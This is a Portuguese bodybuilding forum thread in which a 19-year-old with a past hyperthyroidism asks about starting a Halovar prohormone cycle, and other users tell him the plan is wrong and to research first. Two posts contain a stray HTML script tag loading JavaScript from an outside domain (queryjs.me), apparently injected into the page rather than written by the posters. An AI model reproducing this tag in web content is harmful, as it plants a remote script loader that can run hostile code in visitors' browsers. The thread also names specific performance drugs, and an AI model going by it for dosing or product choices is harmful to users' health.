Ir para conteúdo
  • Cadastre-se

[Falta de Pesquisa]Começar Ciclo Ph

Posts Recomendados

Postado

Olá galera, bem gente quero começar meu ciclo com PH. Irei comprar o Halovar, Junto com o organ shield e para o TPC Recycle + Tribulus. Tenho 19 anos, 60 KG, 1M,70. Ja tive Hipertiroidismo, vcs acham que tem algum problema? Alguem que ja teve ja tomou? E o ciclo vcs acham que ta bom?

Publicidade

Postado

Olá galera, bem gente quero começar meu ciclo com PH. Irei comprar o Halovar, Junto com o organ shield e para o TPC Recycle + Tribulus. Tenho 19 anos, 60 KG, 1M,70. Ja tive Hipertiroidismo, vcs acham que tem algum problema? Alguem que ja teve ja tomou? E o ciclo vcs acham que ta bom?

Tudo errado cara

Pesquisa antes que te joguem pedras, sugiro mudar a imagem de perfil também.

Só um conselho mesmo

Postado

<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

Oque esta errado?

1 - O halovar pelo que sei já não é fabricado a longos anos, assim como o m-drol, então pode ser falso

2 - organ shield é inutil no geral

3 - recycle não é tpc

4 - tribullus não é tpc

5 - 60kg/1,70m tu nem base muscular tem pra cicar...

fora que não tem a estrutura do ciclo, pra saber se estaria certo

Postado

Tudo errado cara

Pesquisa antes que te joguem pedras, sugiro mudar a imagem de perfil também.

Só um conselho mesmo

+1

1 - O halovar pelo que sei já não é fabricado a longos anos, assim como o m-drol, então pode ser falso

3 - recycle não é tpc

4 - tribullus não é tpc

+1

Postado (editado)

Acho que tudo já foi esclarecido.

Agora é pesquisar para entäo desistir da idéia ou montar um ciclo decente.

Editado por Torf
Postado

<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

3 - recycle não é tpc

4 - tribullus não é tpc

Oque voce aconselharia entao??

Ao inves do Halovar, no caso poderia ser um h-stane?

Postado

Oque voce aconselharia entao??

Pesquisa mano, aprenda sobre metodos de treino e quais você se adapta melhor, a mesma coisa com as dietas de todos os tipos.

Depois, quando já conhecer seu corpo, como ele funciona, ou não funciona, você provavelmente já vai ter um certo tamanho, aí sim vá atrás de drogas se quiser

Pesquise sobre elas, veja o que é mais interessante pra você, etc. O proprio forum é superlotado dessas informações

Visitante
Este tópico está impedido de receber novos posts.
  • Criar Novo...